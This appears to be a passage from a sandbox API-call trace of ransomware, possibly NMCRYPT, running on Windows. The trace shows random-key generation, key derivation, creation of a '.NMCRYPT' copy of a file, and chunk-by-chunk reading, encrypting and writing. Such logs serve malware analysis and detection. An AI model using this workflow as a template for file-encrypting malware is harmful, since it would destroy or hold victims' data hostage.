CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.285] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.285] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.285] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.285] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.285] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.285] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.285] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.285] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.285] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.285] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.285] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.285] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.285] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.285] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.285] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.285] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.285] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.285] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.285] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.285] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.285] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.285] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.285] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.285] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.285] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.285] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.285] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.285] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.285] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.285] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.285] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.285] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.285] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.286] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.286] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.286] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.286] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.286] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.286] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.286] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.286] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.286] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.286] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.286] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.286] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.286] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.286] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.286] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.286] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.286] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.286] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.286] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.286] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.286] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.286] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.286] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.286] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.286] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.286] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.286] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.286] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.286] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.286] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.286] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.286] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.286] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.286] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.286] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.286] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.286] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.286] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.286] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.286] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.286] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.286] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.286] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.286] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.286] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.286] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.286] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.286] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.286] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.286] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.286] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.287] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.287] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.287] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.287] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.287] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.287] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.287] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.287] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.287] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.287] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.287] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.287] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.287] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.287] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.287] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.287] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.287] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.287] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.287] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.287] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.287] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.287] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.287] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.287] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.287] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.287] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.287] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.287] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.287] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.287] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.287] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.287] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.287] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.287] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.287] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.287] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.287] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.287] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.287] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.287] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.287] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.287] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.287] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.287] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.287] CryptEncrypt (in: hKey=0x8c6ba8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x1d445310*, pdwDataLen=0x2d7e16c*=0xf4, dwBufLen=0xaa0 | out: pbData=0x1d445310*, pdwDataLen=0x2d7e16c*=0x100) returned 1 [0153.288] CryptEncrypt (in: hKey=0x8c6ba8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x1d445410*, pdwDataLen=0x2d7e16c*=0x1c, dwBufLen=0x9a0 | out: pbData=0x1d445410*, pdwDataLen=0x2d7e16c*=0x100) returned 1 [0153.288] CryptCreateHash (in: hProv=0x8e3440, Algid=0x800e, hKey=0x0, dwFlags=0x0, phHash=0x1d444854 | out: phHash=0x1d444854) returned 1 [0153.288] CryptHashData (hHash=0x9ad1f8, pbData=0x2d7e1f0, dwDataLen=0x100, dwFlags=0x0) returned 1 [0153.288] CryptDeriveKey (in: hProv=0x8e3440, Algid=0x6610, hBaseData=0x9ad1f8, dwFlags=0x4, phKey=0x1d444858 | out: phKey=0x1d444858*=0x9ad478) returned 1 [0153.288] CryptSetKeyParam (hKey=0x9ad478, dwParam=0x1, pbData=0x2d7e2f0, dwFlags=0x0) returned 1 [0153.288] CryptSetKeyParam (hKey=0x9ad478, dwParam=0x4, pbData=0x2d7e1a0*=0x1, dwFlags=0x0) returned 1 [0153.288] wcslen (_String="\\\\?\\") returned 0x4 [0153.288] CryptDuplicateKey (in: hKey=0x9ad478, pdwReserved=0x0, dwFlags=0x0, phKey=0x2d7e174 | out: phKey=0x2d7e174*=0x9ad838) returned 1 [0153.288] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\split.avi.NMCRYPT" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\split.avi.nmcrypt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x588 [0153.289] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\split.avi" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\split.avi"), dwDesiredAccess=0x80000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1624 [0153.290] GetFileSizeEx (in: hFile=0x1624, lpFileSize=0x2d7e164 | out: lpFileSize=0x2d7e164*=181964) returned 1 [0153.290] WriteFile (in: hFile=0x588, lpBuffer=0x1d445310*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d445310*, lpNumberOfBytesWritten=0x2d7e15c*=0x200, lpOverlapped=0x0) returned 1 [0153.290] ReadFile (in: hFile=0x1624, lpBuffer=0x29012d8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012d8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0153.292] CryptEncrypt (in: hKey=0x9ad838, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0153.292] GetLastError () returned 0x0 [0153.292] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0153.431] ReadFile (in: hFile=0x1624, lpBuffer=0x29012d8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012d8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0153.431] CryptEncrypt (in: hKey=0x9ad838, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0153.431] GetLastError () returned 0x0 [0153.432] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0153.432] ReadFile (in: hFile=0x1624, lpBuffer=0x29012d8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012d8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0153.432] CryptEncrypt (in: hKey=0x9ad838, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0153.432] GetLastError () returned 0x0 [0153.432] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0153.432] ReadFile (in: hFile=0x1624, lpBuffer=0x29012d8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012d8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0153.432] CryptEncrypt (in: hKey=0x9ad838, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0153.432] GetLastError () returned 0x0 [0153.432] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0153.432] ReadFile (in: hFile=0x1624, lpBuffer=0x29012d8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012d8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0153.432] CryptEncrypt (in: hKey=0x9ad838, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0153.432] GetLastError () returned 0x0 [0153.432] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0153.432] ReadFile (in: hFile=0x1624, lpBuffer=0x29012d8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012d8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0153.432] CryptEncrypt (in: hKey=0x9ad838, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0153.432] GetLastError () returned 0x0 [0153.432] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0153.432] ReadFile (in: hFile=0x1624, lpBuffer=0x29012d8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012d8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0153.432] CryptEncrypt (in: hKey=0x9ad838, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0153.432] GetLastError () returned 0x0 [0153.432] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0153.432] ReadFile (in: hFile=0x1624, lpBuffer=0x29012d8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012d8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0153.432] CryptEncrypt (in: hKey=0x9ad838, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0153.432] GetLastError () returned 0x0 [0153.432] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0153.433] ReadFile (in: hFile=0x1624, lpBuffer=0x29012d8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012d8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0153.433] CryptEncrypt (in: hKey=0x9ad838, 